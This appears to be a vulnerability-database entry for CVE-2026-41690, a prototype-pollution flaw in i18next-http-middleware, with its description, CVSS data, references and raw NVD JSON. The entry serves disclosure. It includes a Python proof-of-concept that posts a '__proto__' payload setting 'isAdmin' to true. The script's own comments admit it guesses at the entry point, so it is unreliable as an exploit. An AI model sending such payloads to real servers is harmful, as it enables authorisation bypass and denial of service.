CVE-2026-41690

Description

18next-http-middleware is a middleware to be used with Node.js web frameworks like express or Fastify and also for Deno. Versions prior to 3.9.3 allow an unauthenticated HTTP client to pollute Object.prototype in the Node.js process hosting the middleware, via two unvalidated entry points that reach internal object-key writes: getResourcesHandler and missingKeyHandler. This can break authorisation checks (if (user.isAdmin) returning true for any user), cause type-confusion DoS, and depending on downstream code it can be chained into RCE.

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

No configuration data available.

i18next-http-middleware < 3.9.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# POC for CVE-2026-41690
# Targeting the getResourcesHandler or missingKeyHandler entry points

target_url = "http://localhost:3000/locales/en/translation"  # Example endpoint

# Malicious payload designed to pollute Object.prototype
# This attempts to inject a property into the prototype chain
payload = {
    "lng": "en",
    "ns": "translation",
    # The specific key depends on implementation, often merging user input directly
    # Sending a JSON object with __proto__ key
    "__proto__": {
        "polluted": True,
        "isAdmin": True
    }
}

headers = {
    "Content-Type": "application/json"
}

try:
    response = requests.post(target_url, json=payload, headers=headers)
    print(f"[+] Request sent to {target_url}")
    print(f"[+] Status Code: {response.status_code}")
    
    # Verification logic would typically run on the server side
    # checking if ({}).polluted returns true
    print("[+] If vulnerable, Object.prototype has been polluted.")
    
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41690
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41690
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41690/
[4] VulDB https://vuldb.com/cve/CVE-2026-41690
[5] https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-5fgg-jcpf-8jjw

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41690", "sourceIdentifier": "[email protected]", "published": "2026-05-08T16:16:11.473", "lastModified": "2026-05-08T16:16:11.473", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "18next-http-middleware is a middleware to be used with Node.js web frameworks like express or Fastify and also for Deno. Versions prior to 3.9.3 allow an unauthenticated HTTP client to pollute Object.prototype in the Node.js process hosting the middleware, via two unvalidated entry points that reach internal object-key writes: getResourcesHandler and missingKeyHandler. This can break authorisation checks (if (user.isAdmin) returning true for any user), cause type-confusion DoS, and depending on downstream code it can be chained into RCE."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-1321"}]}], "references": [{"url": "https://github.com/i18next/i18next-http-middleware/security/advisories/GHSA-5fgg-jcpf-8jjw", "source": "[email protected]"}]}}